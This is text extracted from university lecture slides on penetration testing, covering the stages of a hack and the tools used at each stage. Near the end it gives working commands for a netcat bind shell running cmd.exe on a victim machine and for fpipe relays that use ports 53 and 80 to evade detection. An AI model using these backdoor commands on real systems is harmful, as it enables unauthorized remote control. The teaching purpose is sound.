Penetrate Testing
C. Edward Chow
cs591
1
chow
Outline of The Talk









Definition, Concepts on Penetration Testing/Hacking
Anatomy of a Hack
Framework for penetration studies
Skills and Requirements of a Penetration Tester
SAN list of Security Holes
Internet Penetration
Dial up Penetration
Internal Penetration
References:
 CORE IMPACT - Penetration Testing: Assessing Your Overall
Security Before Attackers Do
 Pages 165,277 Security in Computing.
 Hack I.T, Security Through Penetration Testing, by T.J.
Klevinksy, Scott Laliberte, Ajay Gupta.
 http://www.hackingexposed.com/win2k/links.html
cs591
2
chow
Definition








Vulnerability (Security Flaw): specific failure of the system to guard against
unauthorized access or actions. It can be procedures, technology (SW or
HW), or management.
Using the failure of the system to violate the site security policy is called
exploiting the vulnerability
Penetration Study is a test for evaluating the strengths of all security
controls on the computer system. It intends to find all possible security
holes and provides suggestions for fixing them.
Penetration Testing is an authorized attempt to violate specific constraints
stated in the form of a security or integrity policy.
Penetration Testing is a testing technique for discovering, understanding,
and documenting all the security holes that can be found in a system.
It is not a proof techniques. It can never prove the absence of security
flaws. It can only prove their presence.
Example goals of penetration studies are gaining of read or write access to
specific objects, files, or accounts; gaining of specific privileges; and
disruption or denial of the availability of objects.
What is the difference between penetration testing and hacking/intrusion?
cs591
3
chow
More Thorough Penetration Study



A more thorough penetration study is to find the proper
interpretation of vulnerabilities found, draw conclusion
on the care taken in the design and implementation.
A simple list of vulnerabilities , although helpful in
closing those specific holes, contribute far less to the
security of a system.
In practice, constrains (resource, money, time) affect the
penetration study
cs591
4
chow
Hacking
Methodology
(Steps)

An excellent
description
inside of the
back cover
page of
“Hacking
Exposed”
text by
McClure et
al.
cs591
Footprinting
Scanning
whois, nslookup
Nmap, fping
Enumeration
dumpACL, showmount
legion, rpcinfo
Gaining Access
Tcpdump, Lophtcrack
NAT
Escalating Privilege
Johntheripper, getadmin
Pilferting
Rhosts, userdata
Config files, registry
Covering Tracks
zap, rootkits
Creating Back Doors
Cron,at, startup folder
netcat, keystroke logger
remote desktop
Denial of Service
Synk4, ping of death
tfn/stacheldraht
5
chow
Footprinting







Information gathering. Sam Spade is window-based network query tool.
Find out target IP address/phone number range
 Why check phone numbers?
Namespace acquisition. Network Topology (visualRoute).
It is essential to a “surgical” attack.
The key here is not to miss any details.
Note that for penetration tester, this step is to avoiding testing others
instead of your client and to include all systems to be tested (sometime the
organization will not tell you what their systems consist of).
Defense: deploy NIDS (snort), RotoRouter
Techniques Open Source
search
Find domain name, DNS zone
admin, IP addresses transfer
name servers
Tools
Whois
(Network solution;
arin)
cs591
Google, search
engine, Edgar
6
Nslookup (ls –d)
dig
Sam Spade
chow
Scanning





Bulk Target assessment
Which machine is up and what ports (services) are open
Focus on most promising avenues of entry.
To avoid being detect, these tools can reduce frequency of packet
sending and randomize the ports or IP addresses to be scanned in
the sequence.
Note that some machine does not respond to ping but responds to
requests to ports that actually open. Ardor is an example.
Techniques Ping sweep
TCP/UDP port
scan
OS detection
Tools
Nmap
Superscan
fscan
Nmap
queso
siphon
cs591
Fping, icmpenum
WS_Ping ProPack
nmap
7
chow
Enumeration


Identify valid user accounts or poorly protected resource shares.
Most intrusive probing than scanning step.
cs591
Techniques
list user
accounts
list file shares
identify
applications
Tools
Null sessions
DumpACL
Sid2usre
onSiteAdmin
Showmount
NAT
legion
Banner grabing
with telnet or
netcat, rpcinfo
8
chow
Gaining Access

Based on the information gathered so far, make an informed
attempted to access the target.
Techniq
ues
Password
File share
eavesdropping brute forcing
Password
File grab
Tools
Tcpdump/ssldu NAT
mp
legion
L0phtcrack
readsmb
Tftp
Ttdb, bind
Pwddump2(NT) IIS
.HTR/ISM.
DLL
cs591
9
Buffer
overflow
chow
Escalating Privilege

If only user-level access was obtained in the last step, seek to
gain complete control of the system.
cs591
Techniques
Password cracking
Known Exploits
Tools
John the ripper
L0phtcrack
Lc_messages,
Getadmin,
sechole
10
chow
Pilfering

Webster's Revised Unabridged Dictionary (1913)
 Pilfer \Pil"fer\, v. i. [imp. & p. p. Pilfered; p. pr. & vb. n. Pilfering.] [OF.
pelfrer. See Pelf.]
To steal in small quantities, or articles of small value; to practice petty
theft.
 Gather info on identify mechanisms to allow access of trusted systems.
Techniques
Evaluate Trusts
Search for cleartext
passwords
Tools
rhosts
LSA secrets
User data,
Configuration files
Registry
cs591
11
chow
Covering Tracks

Once total ownership of the target is secured, hiding this fact from
system administrators become paramount, less they quickly end
the romp.
Techniques
Clear Logs
Tools
Zap, Event Log GUI Rootkits
file streaming
cs591
12
Hide tools
chow
Creating Back Doors

Trap doors will be laid in various parts of the system to ensure that
privilege access is easily regained whenever the intruder decides.
Techniques Create rogue
user accounts
Schedule batch
jobs
Infect startup files
Tools
Cron, AT
rc, startup folder,
registry keys
Members of
wheel, admin
Techniques Plant remote
Install monitoring
control services mechanisms
Replace appls with
Trojans
Tools
Login, fpnwcint.dll
cs591
Netcat,
remote.exe
VNC, B02K
remote desktop
Keystroke loggers,
add acct. to
secadmin mail
aliases
13
chow
Denial of Services

If atacker is unsuccessful in gaining access, they may use readily
available exploit code to disable a target as a last resort.
Techniques Syn flood
ICMP techniques
Identical src/dst
SYN requests
Tools
Ping to death
smurf
Land
Latierra
Techniques Overlapping
fragment/offset
bugs
Out of bounds TCP
options (OOB)
DDoS
Tools
Keystroke loggers,
add acct. to
secadmin mail
aliases
Trinoo
TFN
stacheldraht
cs591
synk4
Netcat,
remote.exe
VNC, B02K
remote desktop
14
chow
Nessus: Integrated Security Scanning
Tool






Originally designed by Renaud Deraison
Available at www.nessus.org
Main scanning engine running on Unix server with client
GUI running on Unix or Windows.
Pretty good control and reporting.
Include a script language for plug-in (detecting
additional attacks).
http://www.nessus.org/pres/bh2001/index.html
cs591
15
chow
cs591
16
chow
cs591
17
chow
cs591
18
chow
cs591
19
chow
cs591
20
chow
cs591
21
chow
Setting up Backdoor Connection





Once obtain the admin privilege, you install tools that
allow you to run command remotely (e.g. netcat) or use
the machine as a stepping stone for relaying or
redirecting the msg (fpipe)
Port redirection accepts packet from one port and send
it over another port. It can be used to avoid packet filter
firewall.
We will use netcat and fpipe to illustrate the concept.
Netcat is available at
http://www.atstake.com/research/tools/network_utilities/
Fpipe is available at http://www.foundstone.com
cs591
22
chow
Setup Netcat
C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e
cmd.exe -p 80 -s 128.198.177.63
 Hacker runs the nc command on the victim machine, which listens
to the command sent in from port 80, use cmd.exe to run the
command and redirect the console output as http response back.
 listening on [128.198.177.63] 80 ...
 connect to [128.198.177.63] from VIVIAN.eas.uccs.edu listening on
[128.198.177.63] 80 ...
 connect to [128.198.177.63] from VIVIAN.eas.uccs.edu
 Here we bind in front of port 80. You can also use port 139. The
idea is used known port to avoid detection.
 -L is used to repeat previous command after connection is
terminated.
 The nc command will receive command from packet to port 80, and
chow
23
run it with cmd.exe and send back
execution result.
cs591

Setup FPIPE










C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63
FPipe v2.1 - TCP/UDP port redirector.
This is run the infected machine which serves as relay. Use port 53 for
listen to Internet connection, relay any msg from port 53 to machine
with 128.198.177.63 and port 80.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com
Pipe connected:
In: 128.198.162.60:58797 --> 128.198.168.63:53
Out: 128.198.168.63:53 --> 128.198.177.63:80
Pipe connected:
In: 128.198.162.60:58801 --> 128.198.168.63:53
Out: 128.198.168.63:53 --> 128.198.177.63:80
Here the fpipe program listens to packet incoming from blanca to port
53, relay it over to 128.198.177.63
using port 53 (DNS) to avoid chow
24
cs591
detection.

Telnet to the relay host






C:\work\software\security\nc>[cs691@blanca cs691]$ telnet 128.198.168.63 53
Trying 128.198.168.63...
Connected to vivian (128.198.168.63).
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.




C:\work\cucs\cs522\project>dir
dir
Volume in drive C is S3A1203D501
Volume Serial Number is 503B-9F00

Directory of C:\work\cucs\cs522\project



04/29/2003 12:56 PM
04/29/2003 12:56 PM
04/29/2003 12:50 PM

Note that it is the console output of 128.198.177.63 machine being shown here.
cs591
<DIR>
.
<DIR>
..
371,208 erniestInfocom2000.ps
25
chow
Layering of Tests
1.
2.
3.
cs591
External attacker with no knowledge of the system.
External attacker with access to the system.
Internal attacker with access to the system.
26
chow